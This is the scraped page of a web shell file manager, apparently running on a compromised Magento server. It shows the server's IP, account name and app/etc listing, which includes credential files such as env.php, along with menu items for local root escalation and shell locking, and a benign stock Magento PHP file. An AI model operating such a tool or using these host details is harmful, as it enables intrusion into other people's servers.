Linux host2.homegym.sg 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
Apache
Server IP : 159.223.38.192 & Your IP : 159.223.38.192
Domains : 20 Domain
User : eachadea
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
eachadea /
public_html /
m2 /
app /
etc /
Delete
Unzip
Name
Size
Permission
Date
Action
NonComposerComponentRegistration.php
926
B
-rw-r--r--
2023-01-06 06:58
config.php
17.19
KB
-rw-r--r--
2025-02-20 12:19
config.php-bak
16
KB
-rw-r--r--
2021-04-16 04:06
db_schema.xml
739
B
-rw-r--r--
2023-01-06 06:58
di.php
49.83
KB
-rw-r--r--
2023-11-07 06:36
di.xml
127.17
KB
-rw-r--r--
2023-01-06 06:58
env.php
2.2
KB
-rw-r--r--
2025-02-20 12:19
env.php_bak
3.77
KB
-rw-r--r--
2020-05-24 19:09
env_original
1.67
KB
-rw-r--r--
2020-05-25 06:16
error_log
93
B
-rw-r--r--
2025-10-31 13:08
instant.json
6.7
KB
-rw-r--r--
2021-06-03 15:25
registration_globlist.php
516
B
-rw-r--r--
2023-01-06 06:58
vendor_path.php
138
B
-rw-r--r--
2023-11-07 06:36
Save
Rename
<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ declare(strict_types=1); //Register components (via a list of glob patterns) namespace Magento\NonComposerComponentRegistration; use RuntimeException; /** * Include files from a list of glob patterns */ (static function (): void { $globPatterns = require __DIR__ . '/registration_globlist.php'; $baseDir = \dirname(__DIR__, 2) . '/'; foreach ($globPatterns as $globPattern) { // Sorting is disabled intentionally for performance improvement $files = \glob($baseDir . $globPattern, GLOB_NOSORT); if ($files === false) { throw new RuntimeException("glob(): error with '$baseDir$globPattern'"); } \array_map( static function (string $file): void { require_once $file; }, $files ); } })();